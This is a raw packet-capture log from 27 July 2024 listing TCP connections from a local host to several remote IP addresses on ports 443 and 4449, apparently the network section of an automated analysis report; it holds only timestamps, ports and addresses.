Jul 27, 2024 08:56:22.955066919 CEST	4449	50815	94.156.79.190	192.168.2.4
Jul 27, 2024 08:56:23.436839104 CEST	443	50814	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:23.436947107 CEST	50814	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:23.439579964 CEST	50814	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:23.439631939 CEST	443	50814	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:23.439703941 CEST	50814	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:23.439718008 CEST	443	50814	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:23.440527916 CEST	443	50814	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:23.440742016 CEST	50814	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:23.484586000 CEST	443	50814	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:24.802239895 CEST	443	50814	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:24.802407980 CEST	443	50814	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:24.802496910 CEST	50814	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:24.822798967 CEST	50814	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:24.822798967 CEST	50814	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:24.822863102 CEST	443	50814	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:24.822901011 CEST	443	50814	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:24.927186966 CEST	50816	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:24.927227020 CEST	443	50816	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:24.927315950 CEST	50816	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:24.927680969 CEST	50816	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:24.927690983 CEST	443	50816	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:25.537231922 CEST	443	50816	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:25.537326097 CEST	50816	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:25.539632082 CEST	50816	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:25.539650917 CEST	443	50816	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:25.539716005 CEST	50816	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:25.539731026 CEST	443	50816	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:25.540514946 CEST	443	50816	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:25.540678024 CEST	50816	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:25.588577986 CEST	443	50816	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:26.861795902 CEST	443	50816	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:26.861963034 CEST	443	50816	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:26.862124920 CEST	50816	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:26.962915897 CEST	50816	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:26.962929010 CEST	443	50816	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:26.962965965 CEST	50816	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:26.962970972 CEST	443	50816	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:27.067879915 CEST	50817	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:27.067966938 CEST	443	50817	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:27.068039894 CEST	50817	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:27.068434000 CEST	50817	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:27.068471909 CEST	443	50817	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:28.483150959 CEST	443	50817	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:28.483254910 CEST	50817	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:28.485882044 CEST	50817	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:28.485908031 CEST	443	50817	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:28.485963106 CEST	50817	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:28.485985041 CEST	443	50817	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:28.486336946 CEST	443	50817	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:28.486498117 CEST	50817	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:28.532540083 CEST	443	50817	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:29.462671995 CEST	443	50817	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:29.462747097 CEST	443	50817	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:29.462807894 CEST	50817	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:29.477674961 CEST	50817	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:29.477722883 CEST	443	50817	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:29.477751970 CEST	50817	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:29.477766991 CEST	443	50817	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:29.583710909 CEST	50818	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:29.583741903 CEST	443	50818	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:29.583800077 CEST	50818	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:29.584140062 CEST	50818	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:29.584150076 CEST	443	50818	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:30.206934929 CEST	443	50818	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:30.207006931 CEST	50818	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:30.210022926 CEST	50818	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:30.210030079 CEST	443	50818	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:30.210087061 CEST	50818	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:30.210091114 CEST	443	50818	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:30.210131884 CEST	50818	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:30.210135937 CEST	443	50818	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:30.210385084 CEST	443	50818	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:30.210525036 CEST	50818	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:30.252542019 CEST	443	50818	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:31.572552919 CEST	443	50818	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:31.572710037 CEST	443	50818	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:31.572877884 CEST	50818	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:31.598524094 CEST	50818	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:31.598551035 CEST	443	50818	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:31.598584890 CEST	50818	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:31.598599911 CEST	443	50818	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:31.708455086 CEST	50819	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:31.708539009 CEST	443	50819	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:31.708614111 CEST	50819	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:31.709002018 CEST	50819	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:31.709026098 CEST	443	50819	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:32.299926043 CEST	443	50819	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:32.300023079 CEST	50819	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:32.302385092 CEST	50819	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:32.302392006 CEST	443	50819	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:32.302438974 CEST	50819	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:32.302443981 CEST	443	50819	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:32.302725077 CEST	443	50819	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:32.302838087 CEST	50819	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:32.344538927 CEST	443	50819	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:33.903878927 CEST	443	50819	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:33.903951883 CEST	443	50819	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:33.904014111 CEST	50819	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:33.927125931 CEST	50819	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:33.927125931 CEST	50819	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:33.927158117 CEST	443	50819	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:33.927177906 CEST	443	50819	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:34.036704063 CEST	50820	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:34.036777020 CEST	443	50820	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:34.036864996 CEST	50820	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:34.037277937 CEST	50820	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:34.037307024 CEST	443	50820	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:34.813874960 CEST	443	50820	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:34.813971043 CEST	50820	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:34.816107035 CEST	50820	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:34.816131115 CEST	443	50820	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:34.816180944 CEST	50820	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:34.816191912 CEST	443	50820	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:34.817118883 CEST	443	50820	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:34.817286015 CEST	50820	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:34.860547066 CEST	443	50820	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:36.053044081 CEST	443	50820	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:36.053112984 CEST	443	50820	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:36.053158045 CEST	50820	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:36.072423935 CEST	50820	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:36.072467089 CEST	443	50820	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:36.072519064 CEST	50820	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:36.072536945 CEST	443	50820	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:36.183662891 CEST	50821	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:36.183747053 CEST	443	50821	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:36.183999062 CEST	50821	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:36.184370041 CEST	50821	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:36.184428930 CEST	443	50821	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:36.795634031 CEST	443	50821	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:36.795855045 CEST	50821	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:36.797890902 CEST	50821	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:36.797944069 CEST	443	50821	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:36.798012018 CEST	50821	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:36.798023939 CEST	443	50821	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:36.799015045 CEST	443	50821	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:36.799350023 CEST	50821	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:36.799437046 CEST	443	50821	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:38.084404945 CEST	443	50821	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:38.084677935 CEST	443	50821	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:38.084758043 CEST	50821	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:38.098505974 CEST	50821	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:38.098506927 CEST	50821	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:38.098573923 CEST	443	50821	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:38.098609924 CEST	443	50821	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:38.208659887 CEST	50822	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:38.208741903 CEST	443	50822	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:38.209018946 CEST	50822	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:38.209391117 CEST	50822	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:38.209449053 CEST	443	50822	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:39.040740967 CEST	443	50822	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:39.040915966 CEST	50822	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:39.043421984 CEST	50822	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:39.043447018 CEST	443	50822	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:39.043499947 CEST	50822	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:39.043505907 CEST	443	50822	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:39.043958902 CEST	443	50822	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:39.044111013 CEST	50822	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:39.084578037 CEST	443	50822	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:40.413664103 CEST	443	50822	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:40.413855076 CEST	443	50822	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:40.414043903 CEST	50822	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:40.427974939 CEST	50822	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:40.427974939 CEST	50822	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:40.428039074 CEST	443	50822	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:40.428076029 CEST	443	50822	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:40.536799908 CEST	50823	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:40.536886930 CEST	443	50823	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:40.536978960 CEST	50823	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:40.537337065 CEST	50823	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:40.537374973 CEST	443	50823	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:41.212040901 CEST	443	50823	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:41.212112904 CEST	50823	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:41.214773893 CEST	50823	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:41.214785099 CEST	443	50823	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:41.214829922 CEST	50823	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:41.214834929 CEST	443	50823	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:41.214891911 CEST	50823	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:41.214895964 CEST	443	50823	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:41.215281010 CEST	443	50823	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:41.215423107 CEST	50823	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:41.260534048 CEST	443	50823	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:42.134310961 CEST	443	50823	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:42.134469986 CEST	443	50823	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:42.134557962 CEST	50823	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:42.150063038 CEST	50823	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:42.150106907 CEST	443	50823	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:42.150135994 CEST	50823	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:42.150151014 CEST	443	50823	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:42.255604029 CEST	50824	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:42.255647898 CEST	443	50824	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:42.255847931 CEST	50824	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:42.256155014 CEST	50824	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:42.256172895 CEST	443	50824	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:42.846448898 CEST	443	50824	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:42.846529007 CEST	50824	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:42.849709988 CEST	50824	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:42.849730968 CEST	443	50824	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:42.849787951 CEST	50824	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:42.849798918 CEST	443	50824	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:42.850248098 CEST	443	50824	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:42.850445032 CEST	50824	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:42.896503925 CEST	443	50824	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:44.085832119 CEST	443	50824	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:44.086020947 CEST	443	50824	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:44.086227894 CEST	50824	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:44.100528002 CEST	50824	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:44.100528955 CEST	50824	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:44.100593090 CEST	443	50824	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:44.100678921 CEST	443	50824	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:44.208817959 CEST	50825	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:44.208900928 CEST	443	50825	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:44.209135056 CEST	50825	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:44.209590912 CEST	50825	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:44.209671974 CEST	443	50825	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:44.353054047 CEST	4449	50815	94.156.79.190	192.168.2.4
Jul 27, 2024 08:56:44.353247881 CEST	50815	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 08:56:44.811453104 CEST	443	50825	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:44.811705112 CEST	50825	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:44.813894033 CEST	50825	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:44.813919067 CEST	443	50825	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:44.814182043 CEST	50825	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:44.814205885 CEST	443	50825	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:44.814428091 CEST	443	50825	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:44.814551115 CEST	50825	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:44.856578112 CEST	443	50825	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:46.210922956 CEST	443	50825	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:46.211083889 CEST	443	50825	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:46.211261988 CEST	50825	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:46.224801064 CEST	50825	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:46.224834919 CEST	443	50825	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:46.224857092 CEST	50825	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:46.224865913 CEST	443	50825	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:46.333640099 CEST	50826	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:46.333720922 CEST	443	50826	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:46.333825111 CEST	50826	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:46.334286928 CEST	50826	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:46.334367037 CEST	443	50826	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:46.989454031 CEST	443	50826	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:46.989665031 CEST	50826	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:46.992458105 CEST	50826	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:46.992510080 CEST	443	50826	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:46.992862940 CEST	50826	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:46.992913008 CEST	443	50826	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:46.993083000 CEST	443	50826	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:46.993222952 CEST	50826	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:47.040534019 CEST	443	50826	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:47.368868113 CEST	50815	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 08:56:47.369069099 CEST	50827	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 08:56:47.575361013 CEST	4449	50815	94.156.79.190	192.168.2.4
Jul 27, 2024 08:56:47.575417042 CEST	4449	50827	94.156.79.190	192.168.2.4
Jul 27, 2024 08:56:47.575608015 CEST	50827	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 08:56:47.575949907 CEST	50827	4449	192.168.2.4	94.156.79.190
Jul 27, 2024 08:56:47.581645966 CEST	4449	50827	94.156.79.190	192.168.2.4
Jul 27, 2024 08:56:48.012265921 CEST	443	50826	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:48.012439013 CEST	443	50826	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:48.012662888 CEST	50826	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:48.027076960 CEST	50826	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:48.027077913 CEST	50826	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:48.027141094 CEST	443	50826	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:48.027177095 CEST	443	50826	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:48.130522966 CEST	50828	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:48.130605936 CEST	443	50828	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:48.130708933 CEST	50828	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:48.131155968 CEST	50828	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:48.131210089 CEST	443	50828	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:48.726494074 CEST	443	50828	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:48.726694107 CEST	50828	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:48.729283094 CEST	50828	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:48.729336977 CEST	443	50828	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:48.729406118 CEST	50828	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:48.729419947 CEST	443	50828	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:48.730163097 CEST	443	50828	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:48.730459929 CEST	50828	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:48.776531935 CEST	443	50828	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:50.091363907 CEST	443	50828	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:50.091538906 CEST	443	50828	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:50.091689110 CEST	50828	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:50.106093884 CEST	50828	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:50.106093884 CEST	50828	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:50.106158972 CEST	443	50828	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:50.106194019 CEST	443	50828	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:50.208820105 CEST	50829	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:50.208901882 CEST	443	50829	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:50.208990097 CEST	50829	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:50.209578991 CEST	50829	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:50.209656000 CEST	443	50829	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:50.807807922 CEST	443	50829	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:50.807907104 CEST	50829	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:50.810538054 CEST	50829	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:50.810564995 CEST	443	50829	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:50.810616970 CEST	50829	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:50.810623884 CEST	443	50829	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:50.810945034 CEST	443	50829	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:50.811103106 CEST	50829	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:50.856538057 CEST	443	50829	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:52.054999113 CEST	443	50829	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:52.055174112 CEST	443	50829	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:52.055248022 CEST	50829	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:52.106211901 CEST	50829	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:52.106213093 CEST	50829	443	192.168.2.4	107.173.160.139
Jul 27, 2024 08:56:52.106297970 CEST	443	50829	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:52.106332064 CEST	443	50829	107.173.160.139	192.168.2.4
Jul 27, 2024 08:56:52.208827972 CEST	50830	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:52.208906889 CEST	443	50830	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:52.208998919 CEST	50830	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:52.209522963 CEST	50830	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:52.209556103 CEST	443	50830	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:52.892502069 CEST	443	50830	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:52.892611027 CEST	50830	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:52.894984961 CEST	50830	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:52.895005941 CEST	443	50830	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:52.895080090 CEST	50830	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:52.895091057 CEST	443	50830	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:52.895384073 CEST	443	50830	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:52.895590067 CEST	50830	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:52.940531969 CEST	443	50830	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:53.915659904 CEST	443	50830	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:53.915708065 CEST	443	50830	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:53.915771008 CEST	50830	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:53.929429054 CEST	50830	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:53.929429054 CEST	50830	443	192.168.2.4	167.235.128.153
Jul 27, 2024 08:56:53.929474115 CEST	443	50830	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:53.929500103 CEST	443	50830	167.235.128.153	192.168.2.4
Jul 27, 2024 08:56:54.036690950 CEST	50831	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:54.036776066 CEST	443	50831	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:54.037003040 CEST	50831	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:54.037235022 CEST	50831	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:54.037265062 CEST	443	50831	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:54.648708105 CEST	443	50831	107.173.160.137	192.168.2.4
Jul 27, 2024 08:56:54.648807049 CEST	50831	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:54.651295900 CEST	50831	443	192.168.2.4	107.173.160.137
Jul 27, 2024 08:56:54.651324987 CEST	443	50831	107.173.160.137	192.168.2.4
